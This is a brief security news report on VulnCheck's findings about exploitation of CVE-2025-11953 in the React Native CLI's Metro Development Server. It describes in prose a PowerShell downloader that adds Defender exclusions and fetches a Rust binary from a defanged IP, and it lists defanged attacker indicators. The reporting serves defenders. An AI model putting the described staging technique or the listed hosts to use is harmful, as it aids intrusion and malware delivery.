A technical analysis by VulnCheck said it first observed exploitation of CVE-2025-11953 on December 21, 2025 against the Metro Development Server in the @react-native-community/cli package, a vulnerability assigned a CVSS score of 9.8 that allows unauthenticated remote command execution.
KEY FACTS
- Incident Remote unauthenticated RCE in Metro Development Server
- First observed December 21, 2025
- Severity CVSS 9.8
- Payload Base64 PowerShell downloader that writes and executes a Rust binary
- Indicators Multiple source IP addresses identified
The attacks were detected against a honeypot network and targeted the Metro Development Server component used by the React Native CLI. The activity persisted across multiple weeks with consistent payloads, indicating operational use rather than exploratory probing.
The exploit delivers a Base64-encoded PowerShell script that configures Microsoft Defender Antivirus exclusions for the current working directory and the temporary folder C:\Users\[Username]\AppData\Local\Temp.
The PowerShell script establishes a raw TCP connection to 8.218.43[.]248:60124, requests data, writes the response to a file in the temporary directory and executes it. The retrieved binary is Rust based and includes anti-analysis checks to hinder inspection.
Observed source IP addresses included 5.109.182[.]231, 223.6.249[.]141 and 134.209.69[.]155. Reuse of identical payloads across incidents suggests a coordinated operational campaign.
WHY IT MATTERS
An unauthenticated remote code execution flaw in widely used development tooling can allow attackers to run arbitrary commands and deliver persistent malware. Organizations should treat exposed development servers as production assets and limit network exposure while applying available fixes.